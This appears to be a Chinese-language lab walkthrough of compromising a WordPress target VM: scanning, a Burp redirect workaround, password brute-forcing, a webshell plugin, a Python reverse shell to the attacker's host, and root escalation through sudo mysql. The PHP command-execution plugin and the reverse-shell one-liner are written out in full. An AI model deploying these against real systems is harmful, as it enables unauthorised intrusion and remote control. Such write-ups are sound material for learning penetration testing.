主机发现
靶机 : 192.168.145.131
131 这台主机 存活
端口扫描
nmap -sV -O -p 1-65535 192.168.145.131
存在 80 端口 ,这里连ssh 端口都没了
80 端口存在 Apache httpd 2.4.1
存在 Apache 默认页面
像这种页面 ,没有什么具体的价值 扫描一下是否存在其他页面
目录扫描
feroxbuster 工具
目录探测工具,用暴力结合字典在目标目录中搜索未链接的内容
使用 web目录扫描工具进行扫描发现存在 wordpress 301 重定向
可能搭建了wordpress 博客系统
访问一下 wordpress 登录系统
http://192.168.145.131/wordpress/wp-admin/
web访问一直访问不了 ,一直在转圈圈 oooo
Burp 抓包
抓包查看数据
抓包也是一直转圈圈
但是发现一个奇怪的现象 ,当还存在一直转圈 ,重定向一个我们不知道的地址去
但是当我终止他的时候 ,会发现IP变了 地址没有变
ip 变成了 192.168.159.145
这个IP 可能是重定向的那个内网IP地址
Match and replace rules
匹配替换规则
只要在数据包中发现 存在 192.168.159.145 就替换成 192.168.145.131 这个IP地址
响应 body 也要修改
然后去挂代理访问就可以看见正常的页面了
成功访问页面 了
找到 wordpress 后台页面
爆破
默认admin
然后输入admin admin 不对
那就开始爆破密码
成功爆破出密码
adam14
登录
wordpress 多数是存在文件上传php 文件 反弹shell的
反弹Shell
wordpress 利用上传插件进行 反弹shell
现写个一句话木马
<?php
/**
* Plugin Name:Webshell
* Plugin URI:https//yuanfh.github.io
* Description:WP Webshell for Pentest
* Version:1.0
* Author:aaaa
* Author URI:https://aaaa.github.io
* License:https://aaaa.github.io
*/
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
然后在压缩一下
上传
然后上传成功之后的路径是
/wordpress/wp-content/plugins/shell/
利用shell 进行 RCE
成功执行 id 命令
改变一句话 ,修改成webshell
可以执行命令但是 连接不了webshell
那就使用 命令进行反弹shell
现开启监听
利用
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.145.130",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
成功反弹了shell
MSF漏洞利用
这里有个更加简单的利用方法 ,使用msf进行 利用
在爆破账号密码之后 有个 更好用的方法就是使用MSF自动化的工具去进行获取shell
搜索 wp_admin_shell
存在一个文件上传的漏洞
show 一下 查看需要哪些参数 进行配置
账号密码 路径
一直不成功这里 不知道为啥 。。。。
看来还是得用反弹shell
提权
查看
/etc/passwd
存在着另外一个用户 wpadmin
使用一开始的密码登录
adam14
第一个flag
提权
第一个 sudo -l 查看
发现 mysql 是拥有root 权限的
登录测试了一下 没有密码
去翻翻 wp的配置文件
/var/www/html/wordpress/wp-config.php
wp-config.php 是配置文件
存在数据库的密码 还有一些 key
成功登录数据库
但是还是提权不了
后面反复查看 发现使用sudo /usr/bin/mysql -u root -D wordpress - p
是不需要密码的 靠 。。。。
最后也是终于成功提权 ,成为root 用户